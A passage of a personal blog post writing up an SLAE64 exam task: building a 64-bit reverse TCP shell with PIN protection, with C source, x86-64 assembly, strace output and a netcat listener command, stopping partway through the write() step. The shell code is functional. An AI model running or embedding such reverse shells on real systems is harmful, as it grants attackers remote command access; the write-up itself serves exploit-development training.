<!DOCTYPE html>
<html lang="en"><!--
 __  __                __                                     __
/\ \/\ \              /\ \             __                    /\ \
\ \ \_\ \   __  __    \_\ \      __   /\_\      __       ___ \ \ \/'\
 \ \  _  \ /\ \/\ \   /'_` \   /'__`\ \/\ \   /'__`\    /'___\\ \ , <
  \ \ \ \ \\ \ \_\ \ /\ \L\ \ /\  __/  \ \ \ /\ \L\.\_ /\ \__/ \ \ \\`\
   \ \_\ \_\\/`____ \\ \___,_\\ \____\ _\ \ \\ \__/.\_\\ \____\ \ \_\ \_\
    \/_/\/_/ `/___/> \\/__,_ / \/____//\ \_\ \\/__/\/_/ \/____/  \/_/\/_/
                /\___/                \ \____/
                \/__/                  \/___/

Powered by Hydejack v8.1.1 <https://hydejack.com/>
--><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no"><meta http-equiv="x-ua-compatible" content="ie=edge"><title>64-bit reverse shell with passphrase protection | Silvia’s blog</title><meta name="generator" content="Jekyll v3.8.3" /><meta property="og:title" content="64-bit reverse shell with passphrase protection" /><meta name="author" content="Silvia Väli" /><meta property="og:locale" content="en" /><meta name="description" content="This blog post covers the 2/7 task of the SLAE certificate exam which requires a 64-bit reverse shellcode. To establish a connection user is asked to submit the correct passphrase. Student ID: SLAE64 - 1594" /><meta property="og:description" content="This blog post covers the 2/7 task of the SLAE certificate exam which requires a 64-bit reverse shellcode. To establish a connection user is asked to submit the correct passphrase. Student ID: SLAE64 - 1594" /><link rel="canonical" href="http://localhost:4000/blog/2019-01-25-blog-SLAE2/" /><meta property="og:url" content="http://localhost:4000/blog/2019-01-25-blog-SLAE2/" /><meta property="og:site_name" content="Silvia’s blog" /><meta property="og:type" content="article" /><meta property="article:published_time" content="2019-01-25T00:00:00+02:00" /> <script type="application/ld+json"> {"publisher":{"@type":"Organization","logo":{"@type":"ImageObject","url":"http://localhost:4000/assets/img/profile.jpg"},"name":"Silvia Väli"},"@type":"BlogPosting","url":"http://localhost:4000/blog/2019-01-25-blog-SLAE2/","headline":"64-bit reverse shell with passphrase protection","dateModified":"2019-01-25T00:00:00+02:00","datePublished":"2019-01-25T00:00:00+02:00","author":{"@type":"Person","name":"Silvia Väli"},"mainEntityOfPage":{"@type":"WebPage","@id":"http://localhost:4000/blog/2019-01-25-blog-SLAE2/"},"description":"This blog post covers the 2/7 task of the SLAE certificate exam which requires a 64-bit reverse shellcode. To establish a connection user is asked to submit the correct passphrase. Student ID: SLAE64 - 1594","@context":"http://schema.org"}</script><meta name="mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-title" content="Silvia's blog"><meta name="apple-mobile-web-app-status-bar-style" content="black"><meta name="application-name" content="Silvia's blog"><meta name="msapplication-config" content="/assets/ieconfig.xml"><meta name="theme-color" content="rgb(25,55,71)"><meta name="generator" content="Hydejack v8.1.1" /><link type="application/atom+xml" rel="alternate" href="http://localhost:4000/feed.xml" title="Silvia's blog" /><link rel="alternate" href="http://localhost:4000/blog/2019-01-25-blog-SLAE2/" hreflang="en"><link rel="shortcut icon" href="/assets/icons/favicon.ico"><link rel="apple-touch-icon" href="/assets/icons/icon.png"><link rel="manifest" href="/assets/manifest.json"><link rel="dns-prefetch" href="https://fonts.googleapis.com"><link rel="dns-prefetch" href="https://fonts.gstatic.com"><link rel="dns-prefetch" href="/" id="_baseURL"><link rel="dns-prefetch" href="/assets/js/hydejack-8.1.1.js" id="_hrefJS"><link rel="dns-prefetch" href="/sw.js" id="_hrefSW"><link rel="dns-prefetch" href="/assets/bower_components/fontfaceobserver/fontfaceobserver.standalone.js" id="_hrefFFO"><link rel="dns-prefetch" href="/assets/bower_components/katex/dist/katex.min.js" id="_hrefKatexJS"><link rel="dns-prefetch" href="/assets/bower_components/katex/dist/katex.min.css" id="_hrefKatexCSS"><link rel="dns-prefetch" href="/assets/img/swipe.svg" id="_hrefSwipeSVG"> <script>!function(e,t){"use strict";function n(e,t,n,r){e.addEventListener?e.addEventListener(t,n,r):e.attachEvent?e.attachEvent("on"+t,n):e["on"+t]=n}e.loadJS=function(e,r){var o=t.createElement("script");o.src=e,r&&n(o,"load",r,{once:!0});var a=t.scripts[0];return a.parentNode.insertBefore(o,a),o},e._loaded=!1,e.loadJSDeferred=function(r,o){function a(){e._loaded=!0,o&&n(d,"load",o,{once:!0});var r=t.scripts[0];r.parentNode.insertBefore(d,r)}var d=t.createElement("script");return d.src=r,e._loaded?a():n(e,"load",a,{once:!0}),d},e.setRel=e.setRelStylesheet=function(e){function n(){this.rel="stylesheet"}var r=t.getElementById(e);r.addEventListener?r.addEventListener("load",n,{once:!0}):r.onload=n}}(window,document); !function(a){"use strict";var b=function(b,c,d){function e(a){return h.body?a():void setTimeout(function(){e(a)})}function f(){i.addEventListener&&i.removeEventListener("load",f),i.media=d||"all"}var g,h=a.document,i=h.createElement("link");if(c)g=c;else{var j=(h.body||h.getElementsByTagName("head")[0]).childNodes;g=j[j.length-1]}var k=h.styleSheets;i.rel="stylesheet",i.href=b,i.media="only x",e(function(){g.parentNode.insertBefore(i,c?g:g.nextSibling)});var l=function(a){for(var b=i.href,c=k.length;c--;)if(k[c].href===b)return a();setTimeout(function(){l(a)})};return i.addEventListener&&i.addEventListener("load",f),i.onloadcssdefined=l,l(f),i};"undefined"!=typeof exports?exports.loadCSS=b:a.loadCSS=b}("undefined"!=typeof global?global:this); !function(a){if(a.loadCSS){var b=loadCSS.relpreload={};if(b.support=function(){try{return a.document.createElement("link").relList.supports("preload")}catch(b){return!1}},b.poly=function(){for(var b=a.document.getElementsByTagName("link"),c=0;c<b.length;c++){var d=b[c];"preload"===d.rel&&"style"===d.getAttribute("as")&&(a.loadCSS(d.href,d,d.getAttribute("media")),d.rel=null)}},!b.support()){b.poly();var c=a.setInterval(b.poly,300);a.addEventListener&&a.addEventListener("load",function(){b.poly(),a.clearInterval(c)}),a.attachEvent&&a.attachEvent("onload",function(){a.clearInterval(c)})}}}(this); </script> <script>!function(w, d) { w._noPushState = false; w._noDrawer = false; /**/ loadJS(d.getElementById('_hrefFFO').href, function() { if ('Promise' in w) Promise.all([ new FontFaceObserver('Noto Sans').load(), new FontFaceObserver('Roboto Slab').load(), ]).then(function f() { d.body.classList.add('font-active'); }, function() {}); }); /**/ }(window, document);</script> <!--[if gt IE 8]><!----><link rel="stylesheet" href="/assets/css/hydejack-8.1.1.css"><link rel="stylesheet" href="/assets/icomoon/style.css"><link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto+Slab:400|Noto+Sans:400,400i,700,700i"> <noscript><style> html { font-family: Noto Sans, Helvetica, Arial, sans-serif!important; } h1, h2, h3, h4, h5, h6, .h1, .h2, .h3, .h4, .h5, .h6, .heading { font-family: Roboto Slab, Helvetica, Arial, sans-serif!important; }</style></noscript><style id="_pageStyle"> .content a:not(.btn){color:#4fb1ba;border-color:rgba(79,177,186,0.2)}.content a:not(.btn):hover{border-color:#4fb1ba}:focus{outline-color:#4fb1ba !important}.btn-primary{color:#fff;background-color:#4fb1ba;border-color:#4fb1ba}.btn-primary:focus,.btn-primary.focus,.form-control:focus,.form-control.focus{box-shadow:0 0 0 3px rgba(79,177,186,0.5)}.btn-primary:hover,.btn-primary.hover{color:#fff;background-color:#409ba3;border-color:#409ba3}.btn-primary:disabled,.btn-primary.disabled{color:#fff;background-color:#4fb1ba;border-color:#4fb1ba}.btn-primary:active,.btn-primary.active{color:#fff;background-color:#409ba3;border-color:#409ba3}::selection{color:#fff;background:#4fb1ba}::-moz-selection{color:#fff;background:#4fb1ba}</style><!--<![endif]--><body><div id="_navbar" class="navbar fixed-top"><div class="content"><div class="nav-btn-bar"> <span class="sr-only">Jump to:</span> <a id="_menu" class="nav-btn no-hover fl" href="#_navigation"> <span class="sr-only">Navigation</span> <span class="icon-menu"></span> </a></div></div></div><hr class="sr-only" hidden /> <hy-push-state replace-ids="_main" link-selector="a[href]:not([href*='/assets/']):not(.external):not(.no-push-state)" duration="250" script-selector="script:not([type^='math/tex'])" prefetch ><main id="_main" class="content fade-in layout-post" role="main" data-color="rgb(79,177,186)" data-theme-color="rgb(25,55,71)" data-image="/assets/img/sidebar-bg.jpg" data-overlay ><article id="post-blog-blog-SLAE2" class="page post mb6" role="article"><header><h1 class="post-title"> 64-bit reverse shell with passphrase protection</h1><p class="post-date heading"> <time datetime="2019-01-25T00:00:00+02:00">25 Jan 2019</time> in <a href="/blog/" class="flip-title">Blog</a><div class="hr pb0"></div></header><p>This blog post covers the 2/7 task of the <a href="https://www.pentesteracademy.com/course?id=7">SLAE certificate exam</a> which requires a 64-bit reverse shellcode. To establish a connection user is asked to submit the correct passphrase.<br /> <b>Student ID</b>: SLAE64 - 1594<p><b>Task - </b> Create a reverse TCP shellcode which:<ul><li>reverse connects to configured IP and Port<li>needs a “passcode”<li>if passcode is entered correctly then executes shell<li>remove all 0x00 bytes from the bind TCP shellcode</ul><h2 id="reverse-shellcode">Reverse shellcode</h2><p>The essence of a reverse shell is the opposite of bindshell. While bindshell is what remains listening on a port ready to establish a connection to the attacker, then reverse shell is what makes the call back home itself where the attacker is already listening on a specified port.<p>
  <hy-img root-margin="512px"  src="/assets/img/SLAE/bindreverse.png" alt="" >
    <noscript><img data-ignore  src="/assets/img/SLAE/bindreverse.png" alt="" /></noscript>
    <span class="loading" slot="loading" hidden>
      <span class="icon-cog"></span>
    </span>
  </hy-img><h2 id="how-does-reverse-shellcode-look-like-in-c">How does reverse shellcode look like in C?</h2><p>I personally think writing a reverse shell is easier than writing a bind shell and as you can see referring back to my previous blog post <a href="/blog/2019-01-15-blog-SLAE1/">SLAE exam task no. 1</a> that reverse shell is also visibly shorter to implement. We will not have to deal with <code class="highlighter-rouge">accept()</code>, <code class="highlighter-rouge">listen()</code> and <code class="highlighter-rouge">bind()</code> syscalls. Instead we only have 1 new syscall - <code class="highlighter-rouge">connect()</code> which we use to initiate a connection on a socket. The rest of the shellcode remains exactly the same as described in SLAE task 1.<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cm">/*
reverse TCP shell which establishes a connection back on port 4444, if the PIN code 1234 is submitted.
$ gcc reverse.c -o reverse
$ ./reverse
*/</span>

<span class="err">#</span><span class="nx">include</span> <span class="o">&lt;</span><span class="nx">stdio</span><span class="p">.</span><span class="nx">h</span><span class="o">&gt;</span>
<span class="err">#</span><span class="nx">include</span> <span class="o">&lt;</span><span class="nx">unistd</span><span class="p">.</span><span class="nx">h</span><span class="o">&gt;</span>
<span class="err">#</span><span class="nx">include</span> <span class="o">&lt;</span><span class="nx">sys</span><span class="o">/</span><span class="nx">socket</span><span class="p">.</span><span class="nx">h</span><span class="o">&gt;</span>
<span class="err">#</span><span class="nx">include</span> <span class="o">&lt;</span><span class="nx">sys</span><span class="o">/</span><span class="nx">types</span><span class="p">.</span><span class="nx">h</span><span class="o">&gt;</span>
<span class="err">#</span><span class="nx">include</span> <span class="o">&lt;</span><span class="nx">netinet</span><span class="o">/</span><span class="k">in</span><span class="p">.</span><span class="nx">h</span><span class="o">&gt;</span>
<span class="err">#</span><span class="nx">include</span> <span class="o">&lt;</span><span class="nx">string</span><span class="p">.</span><span class="nx">h</span><span class="o">&gt;</span>

<span class="kr">int</span> <span class="nx">main</span><span class="p">()</span>
<span class="p">{</span>
	<span class="kr">int</span> <span class="nx">sockfd</span><span class="p">;</span>
	<span class="kr">char</span> <span class="nx">buf</span><span class="p">[</span><span class="mi">4</span><span class="p">];</span>
	<span class="kr">int</span> <span class="nx">result</span><span class="p">;</span>

	<span class="nx">struct</span> <span class="nx">sockaddr_in</span> <span class="nx">server</span><span class="p">;</span>
	<span class="nx">server</span><span class="p">.</span><span class="nx">sin_family</span> <span class="o">=</span> <span class="nx">AF_INET</span><span class="p">;</span>
	<span class="nx">server</span><span class="p">.</span><span class="nx">sin_addr</span><span class="p">.</span><span class="nx">s_addr</span> <span class="o">=</span> <span class="nx">INADDR_ANY</span><span class="p">;</span>
	<span class="nx">server</span><span class="p">.</span><span class="nx">sin_port</span> <span class="o">=</span> <span class="nx">htons</span><span class="p">(</span><span class="mi">4444</span><span class="p">);</span>
	<span class="nx">bzero</span><span class="p">(</span><span class="o">&amp;</span><span class="nx">server</span><span class="p">.</span><span class="nx">sin_zero</span><span class="p">,</span> <span class="mi">8</span><span class="p">);</span>

	<span class="kr">char</span> <span class="o">*</span><span class="kd">const</span> <span class="nx">argv</span><span class="p">[]</span> <span class="o">=</span> <span class="p">{</span><span class="s2">"/bin/sh"</span><span class="p">,</span> <span class="nx">NULL</span><span class="p">};</span>
	<span class="kr">char</span> <span class="o">*</span><span class="kd">const</span> <span class="nx">envp</span><span class="p">[]</span> <span class="o">=</span> <span class="p">{</span><span class="nx">NULL</span><span class="p">};</span>

	<span class="c1">//create a socket</span>
	<span class="nx">sockfd</span> <span class="o">=</span> <span class="nx">socket</span><span class="p">(</span><span class="nx">AF_INET</span><span class="p">,</span> <span class="nx">SOCK_STREAM</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
	<span class="c1">//initiate a connection on a socket, on success 0 is returned</span>
	<span class="nx">connect</span><span class="p">(</span><span class="nx">sockfd</span><span class="p">,</span> <span class="p">(</span><span class="nx">struct</span> <span class="nx">sockaddr</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="nx">server</span><span class="p">,</span> <span class="nx">sizeof</span><span class="p">(</span><span class="nx">server</span><span class="p">));</span>
	<span class="nx">dup2</span><span class="p">(</span><span class="nx">sockfd</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
	<span class="nx">dup2</span><span class="p">(</span><span class="nx">sockfd</span><span class="p">,</span> <span class="mi">1</span><span class="p">);</span>
	<span class="nx">dup2</span><span class="p">(</span><span class="nx">sockfd</span><span class="p">,</span> <span class="mi">2</span><span class="p">);</span>

	<span class="nx">write</span><span class="p">(</span><span class="nx">sockfd</span><span class="p">,</span> <span class="s2">"PIN:"</span><span class="p">,</span> <span class="mi">4</span><span class="p">);</span>
	<span class="nx">read</span><span class="p">(</span><span class="nx">sockfd</span><span class="p">,</span> <span class="o">&amp;</span><span class="nx">buf</span><span class="p">,</span> <span class="mi">4</span><span class="p">);</span>

	<span class="nx">result</span> <span class="o">=</span> <span class="nx">strncmp</span><span class="p">(</span><span class="s2">"1234"</span><span class="p">,</span> <span class="nx">buf</span><span class="p">,</span> <span class="mi">4</span><span class="p">);</span>
	<span class="k">if</span><span class="p">(</span><span class="nx">result</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span>
	<span class="p">{</span>
		<span class="nx">execve</span><span class="p">(</span><span class="s2">"/bin/sh"</span><span class="p">,</span> <span class="nx">argv</span><span class="p">,</span> <span class="nx">envp</span><span class="p">);</span>
	<span class="p">}</span>
	<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>

<span class="p">}</span>
</code></pre></div></div><h4 id="connect-syscall"><b>connect() syscall</b></h4><p>By the <a href="http://man7.org/linux/man-pages/man2/connect.2.html">Linux Programmer’s Manual</a>, <code class="highlighter-rouge">connect()</code> syscall takes 3 arguments: a <b>file descriptor</b> which refers to the socket we want to connect to, <b>addr</b> struct which specifies the address information (IP and port) and <b>addrlen</b>, the length of that address structure.<p>The socket we are going to be connecting to is of type AF_INET, which tells us we are dealing with an IPv4 address space. For IPv4 address space we need to specify AF_INET as the address family. We also specify with INADDR_ANY that we are making a connection to 0.0.0.0 and <code class="highlighter-rouge">htons(4444)</code> presents the port to connect to in network byte order. Finally we add 8 zero bytes by using bzero() function as per definition.<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">struct</span> <span class="nx">sockaddr_in</span> <span class="nx">server</span><span class="p">;</span>
<span class="nx">server</span><span class="p">.</span><span class="nx">sin_family</span> <span class="o">=</span> <span class="nx">AF_INET</span><span class="p">;</span>
<span class="nx">server</span><span class="p">.</span><span class="nx">sin_addr</span><span class="p">.</span><span class="nx">s_addr</span> <span class="o">=</span> <span class="nx">INADDR_ANY</span><span class="p">;</span>
<span class="nx">server</span><span class="p">.</span><span class="nx">sin_port</span> <span class="o">=</span> <span class="nx">htons</span><span class="p">(</span><span class="mi">4444</span><span class="p">);</span>
<span class="nx">bzero</span><span class="p">(</span><span class="o">&amp;</span><span class="nx">server</span><span class="p">.</span><span class="nx">sin_zero</span><span class="p">,</span> <span class="mi">8</span><span class="p">);</span>
</code></pre></div></div><p>To implement <code class="highlighter-rouge">connect()</code> syscall successfully, the start address of the addr structure shold be specified as the 2nd argument (RSI). The third argument in turn should hold the length of the structure which we get when we add up the bytes of each of the structure members.<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>server.sin_family = 2 bytes
server.sin_addr.s_addr = 4 bytes
server.sin_port = 2 bytes
bzero(&amp;server.sin_zero, 8) = 8 bytes

= total of 16 bytes
</code></pre></div></div><h3 id="assembly">Assembly</h3><p>Now that we have gotten familiary with the <code class="highlighter-rouge">connect()</code> syscall, let’s try to analyze and understand the assembly code which corresponds to the C code presented in the beginning of this blog post. I have decided to do it in 3 parts. First part is about how we use assembly to initiate the call back home, second part is what comes after we have established a connection and require the user to submit the correct PIN code. Based on the PIN code we can make a desicion whether to take the <code class="highlighter-rouge">exit()</code> syscall or jump to the 3rd part of the assembly code where we execute the actual shell via <code class="highlighter-rouge">execve()</code>.<h4 id="part-1---making-a-call-home"><b>Part 1</b> - making a call home</h4><p>First thing we are going to do is create a new socket by using the <code class="highlighter-rouge">socket()</code> syscall. It takes 3 parameters and by convention these go to RDI, RSI and RDX registers. RDI will hold the address family AF_INET. You can find the corresponding number to AF_INET with python oneliner <code class="highlighter-rouge">python -c import socket; print socket.AF_INET'</code>. Same goes for the SOCK_STREAM <code class="highlighter-rouge">python -c 'import socket; print socket.SOCK_STREAM'</code> which means we want the socket to be a TCP socket. At label <code class="highlighter-rouge">socket:</code> we are using the ADD instruction to load these values (AF_INET: 2, SOCKSTREAM: 1) to registers RDI and RSI. The 3rd argument simply needs to be 0, so we can use the XOR instruction, as something XOR-ed by itself is always zero.<p>On successful return <code class="highlighter-rouge">socket()</code> returns as a non-negative number which is a file descriptor. This return value by convention is saved into RAX and this is the reason why on the last 2 lines we are moving the value from RAX to RDI and then clearing the RAX value as each following syscall would otherwise overwrite and destroy the fd.<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">;</span><span class="nx">reverseshell</span> <span class="nx">which</span> <span class="nx">connects</span> <span class="nx">back</span> <span class="nx">on</span> <span class="nx">port</span> <span class="mi">4444</span> <span class="k">if</span> <span class="nx">the</span> <span class="nx">correct</span> <span class="nx">PIN</span> <span class="nx">code</span> <span class="mi">1234</span> <span class="nx">is</span> <span class="nx">submitted</span><span class="p">.</span>

<span class="nb">global</span> <span class="nx">_start</span><span class="p">:</span>
<span class="nx">section</span> <span class="p">.</span><span class="nx">text</span>

<span class="nx">_start</span><span class="p">:</span>

<span class="nx">socket</span><span class="p">:</span>
	<span class="p">;</span><span class="nx">sockfd</span> <span class="o">=</span> <span class="nx">socket</span><span class="p">(</span><span class="nx">AF_INET</span><span class="p">,</span> <span class="nx">SOCK_STREAM</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
	<span class="nx">xor</span> <span class="nx">rdi</span><span class="p">,</span> <span class="nx">rdi</span>
	<span class="nx">mov</span> <span class="nx">rdx</span><span class="p">,</span> <span class="nx">rdi</span>
	<span class="nx">add</span> <span class="nx">rdi</span><span class="p">,</span> <span class="mi">2</span>
	<span class="nx">xor</span> <span class="nx">rsi</span><span class="p">,</span> <span class="nx">rsi</span>
	<span class="nx">add</span> <span class="nx">rsi</span><span class="p">,</span> <span class="mi">1</span>

	<span class="nx">xor</span> <span class="nx">rax</span><span class="p">,</span> <span class="nx">rax</span>
	<span class="nx">add</span> <span class="nx">rax</span><span class="p">,</span> <span class="mi">41</span>
	<span class="nx">syscall</span>

	<span class="p">;</span><span class="nx">save</span> <span class="nx">the</span> <span class="nx">fd</span> <span class="k">for</span> <span class="nx">other</span> <span class="nx">syscalls</span>
	<span class="nx">mov</span> <span class="nx">rdi</span><span class="p">,</span> <span class="nx">rax</span>
	<span class="nx">xor</span> <span class="nx">rax</span><span class="p">,</span> <span class="nx">rax</span>
</code></pre></div></div><p>You can also make a simple test at this point to know if your assembly code is written correctly or not, by using the strace tool. You should see AF_INET, SOCK_STREAM and IPPROTO_IP as arguments and a non-negative file descriptor number after the equal sign.<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">$</span> <span class="nx">nasm</span> <span class="o">-</span><span class="nx">felf64</span> <span class="nx">reverse</span><span class="p">.</span><span class="nx">nasm</span> <span class="o">-</span><span class="nx">o</span> <span class="nx">reverse</span><span class="p">.</span><span class="nx">o</span>
<span class="nx">$</span> <span class="nx">ld</span> <span class="nx">reverse</span><span class="p">.</span><span class="nx">o</span> <span class="o">-</span><span class="nx">o</span> <span class="nx">reverse</span>
<span class="nx">$</span> <span class="nx">strace</span> <span class="p">.</span><span class="o">/</span><span class="nx">reverse</span>
<span class="nx">execve</span><span class="p">(</span><span class="s2">"./reverse"</span><span class="p">,</span> <span class="p">[</span><span class="s2">"./reverse"</span><span class="p">],</span> <span class="mh">0x7ffd29c78350</span> <span class="cm">/* 63 vars */</span><span class="p">)</span> <span class="o">=</span> <span class="mi">0</span>
<span class="nx">socket</span><span class="p">(</span><span class="nx">AF_INET</span><span class="p">,</span> <span class="nx">SOCK_STREAM</span><span class="p">,</span> <span class="nx">IPPROTO_IP</span><span class="p">)</span> <span class="o">=</span> <span class="mi">3</span>
</code></pre></div></div><p>Moving on to the <code class="highlighter-rouge">connect()</code> syscall. As described already in the bind shellcode post, struct members are layed out in memory contiguously, first member on the lowest and last member on the highest address. This is also the reason why we are pushing the 8 zero bytes to the stack first, 2 bytes for AF_INET the last and then adjust the stack pointer with <code class="highlighter-rouge">sub rsp, 8</code> to point to the beginning of that structure in memory. By doing this we will have the start address of the structure in RSP which we can simply move to RSI for our 2nd argument. We already learned previously that RDX here will hold the size of our structure, which is 16 bytes (<code class="highlighter-rouge">mov rdx, 16</code>).<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
<span class="nx">server_struct</span><span class="p">:</span>
	<span class="nx">push</span> <span class="nx">rax</span>                         <span class="p">;</span><span class="nx">bzero</span><span class="p">(</span><span class="o">&amp;</span><span class="nx">server</span><span class="p">.</span><span class="nx">sin_zero</span><span class="p">,</span> <span class="mi">8</span><span class="p">)</span>
	<span class="nx">mov</span> <span class="nx">dword</span> <span class="p">[</span><span class="nx">rsp</span><span class="o">-</span><span class="mi">4</span><span class="p">],</span> <span class="nx">eax</span>           <span class="p">;</span><span class="nx">server</span><span class="p">.</span><span class="nx">sin_addr</span><span class="p">.</span><span class="nx">s_addr</span><span class="o">=</span><span class="nx">IN_ADDR_ANY</span> <span class="mi">4</span> <span class="nx">bytes</span>
	<span class="nx">mov</span> <span class="nx">word</span> <span class="p">[</span><span class="nx">rsp</span><span class="o">-</span><span class="mi">6</span><span class="p">],</span> <span class="mh">0x5c11</span>         <span class="p">;</span><span class="nx">server</span><span class="p">.</span><span class="nx">sin_port</span><span class="o">=</span> <span class="mi">4444</span> <span class="p">(</span><span class="mh">0x115c</span><span class="p">)</span> <span class="mi">2</span> <span class="nx">bytes</span>
	<span class="nx">mov</span> <span class="nx">word</span> <span class="p">[</span><span class="nx">rsp</span><span class="o">-</span><span class="mi">8</span><span class="p">],</span> <span class="mh">0x2</span>            <span class="p">;</span><span class="nx">server</span><span class="p">.</span><span class="nx">sin_family</span><span class="o">=</span><span class="nx">AF_INET</span><span class="p">,</span> <span class="mi">2</span><span class="nx">bytes</span>
	<span class="nx">sub</span> <span class="nx">rsp</span><span class="p">,</span> <span class="mi">8</span>                       <span class="p">;</span><span class="nx">adjusting</span> <span class="nx">the</span> <span class="nx">stack</span> <span class="nx">pointer</span> <span class="nx">to</span> <span class="nx">point</span> <span class="nx">to</span> <span class="nx">the</span> <span class="nx">start</span> <span class="k">of</span> <span class="nx">the</span> <span class="nx">struct</span>

<span class="nx">connect</span><span class="p">:</span>
	<span class="p">;</span><span class="nx">connect</span><span class="p">(</span><span class="nx">sockfd</span><span class="p">,</span> <span class="p">(</span><span class="nx">struct</span> <span class="nx">sockaddr</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="nx">server</span><span class="p">,</span> <span class="nx">sizeof</span><span class="p">(</span><span class="nx">server</span><span class="p">));</span>
	<span class="nx">mov</span> <span class="nx">rsi</span><span class="p">,</span> <span class="nx">rsp</span>
	<span class="nx">mov</span> <span class="nx">rdx</span><span class="p">,</span> <span class="mi">16</span>
	<span class="nx">add</span> <span class="nx">rax</span><span class="p">,</span> <span class="mi">42</span>
	<span class="nx">syscall</span>

<span class="nx">duplicate_sockets</span><span class="p">:</span>
	<span class="p">;</span><span class="nx">dup2</span><span class="p">(</span><span class="nx">old</span><span class="p">,</span><span class="k">new</span><span class="p">)</span>
	<span class="nx">xor</span> <span class="nx">rsi</span><span class="p">,</span> <span class="nx">rsi</span>
	<span class="nx">xor</span> <span class="nx">rax</span><span class="p">,</span> <span class="nx">rax</span>
	<span class="nx">mov</span> <span class="nx">al</span><span class="p">,</span> <span class="mi">33</span>
	<span class="nx">syscall</span>

	<span class="nx">mov</span> <span class="nx">sil</span><span class="p">,</span> <span class="mi">1</span>
	<span class="nx">mov</span> <span class="nx">al</span><span class="p">,</span> <span class="mi">33</span>
	<span class="nx">syscall</span>

	<span class="nx">mov</span> <span class="nx">sil</span><span class="p">,</span> <span class="mi">2</span>
	<span class="nx">mov</span> <span class="nx">al</span><span class="p">,</span> <span class="mi">33</span>
	<span class="nx">syscall</span>

</code></pre></div></div><p>If the connection succeeds, <code class="highlighter-rouge">connect()</code> will return 0. Let’s validate that by using the strace tool on the shellcode. Open 2 terminal windows.<ol><li>run the command to listen on port 4444 to which our shellcode will try to connect to:<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">nc</span> <span class="o">-</span><span class="nx">l</span> <span class="mi">4444</span>
</code></pre></div></div><li>assemble, link and run the program with strace on 2nd window. You will see <code class="highlighter-rouge">socket()</code> syscall returning us a fd = 3 which is then the 1st argument for <code class="highlighter-rouge">connect()</code> syscall. Second argument is the addr structure and 3rd argument specifies 16 bytes as the length of our struct. We can validate that <code class="highlighter-rouge">connect()</code> returned successfully with return value 0.</ol><div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">$</span> <span class="nx">nasm</span> <span class="o">-</span><span class="nx">felf64</span> <span class="nx">reverse</span><span class="p">.</span><span class="nx">nasm</span> <span class="o">-</span><span class="nx">o</span> <span class="nx">reverse</span><span class="p">.</span><span class="nx">o</span>
<span class="nx">$</span> <span class="nx">ld</span> <span class="nx">reverse</span><span class="p">.</span><span class="nx">o</span> <span class="o">-</span><span class="nx">o</span> <span class="nx">reverse</span>
<span class="nx">$</span> <span class="nx">strace</span> <span class="p">.</span><span class="o">/</span><span class="nx">reverse</span>

<span class="nx">execve</span><span class="p">(</span><span class="s2">"./reverse"</span><span class="p">,</span> <span class="p">[</span><span class="s2">"./reverse"</span><span class="p">],</span> <span class="mh">0x7ffc7f671540</span> <span class="cm">/* 63 vars */</span><span class="p">)</span> <span class="o">=</span> <span class="mi">0</span>
<span class="nx">socket</span><span class="p">(</span><span class="nx">AF_INET</span><span class="p">,</span> <span class="nx">SOCK_STREAM</span><span class="p">,</span> <span class="nx">IPPROTO_IP</span><span class="p">)</span> <span class="o">=</span> <span class="mi">3</span>
<span class="nx">connect</span><span class="p">(</span><span class="mi">3</span><span class="p">,</span> <span class="p">{</span><span class="nx">sa_family</span><span class="o">=</span><span class="nx">AF_INET</span><span class="p">,</span> <span class="nx">sin_port</span><span class="o">=</span><span class="nx">htons</span><span class="p">(</span><span class="mi">4444</span><span class="p">),</span> <span class="nx">sin_addr</span><span class="o">=</span><span class="nx">inet_addr</span><span class="p">(</span><span class="s2">"0.0.0.0"</span><span class="p">)},</span> <span class="mi">16</span><span class="p">)</span> <span class="o">=</span> <span class="mi">0</span>
<span class="nx">dup2</span><span class="p">(</span><span class="mi">3</span><span class="p">,</span> <span class="mi">0</span><span class="p">)</span>                              <span class="o">=</span> <span class="mi">0</span>
<span class="nx">dup2</span><span class="p">(</span><span class="mi">3</span><span class="p">,</span> <span class="mi">1</span><span class="p">)</span>                              <span class="o">=</span> <span class="mi">1</span>
<span class="nx">dup2</span><span class="p">(</span><span class="mi">3</span><span class="p">,</span> <span class="mi">2</span><span class="p">)</span>                              <span class="o">=</span> <span class="mi">2</span>

</code></pre></div></div><h4 id="part-2---enter-the-correct-pin-code"><b>Part 2</b> - enter the correct PIN code</h4><p>In order to ask the user to enter the correct PIN code we have to specify the same file descriptor we used for <code class="highlighter-rouge">connect()</code> syscall also for the <code class="highlighter-rouge">write()</code> syscall as 1st argument (RDI). As we saved the fd to RDI earlier, we have already done that. For argument number 2 we need to provide an address where we have stored the string we want to display to the user “PIN:”. For that we should convert the string to hex, change the byte order as we are dealing with little-endian (<code class="highlighter-rouge">python -c 'import binascii; binascii.hexlify("PIN:"[::-1])'</code>) and then push that value to the stack so we can move the stack address in RSP to RSI.<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">write</span><span class="p">:</span>
	<span class="p">;</span><span class="nx">ssize_t</span> <span class="nx">write</span><span class="p">(</span><span class="kr">int</span> <span class="nx">fd</span><span class="p">,</span> <span class="kd">const</span> <span class="k">void</span> <span class="o">*</span><span class="nx">buf</span><span class="p">,</span> <span class="nx">size_t</span> <span class="nx">count</span><span class="p">);</span>

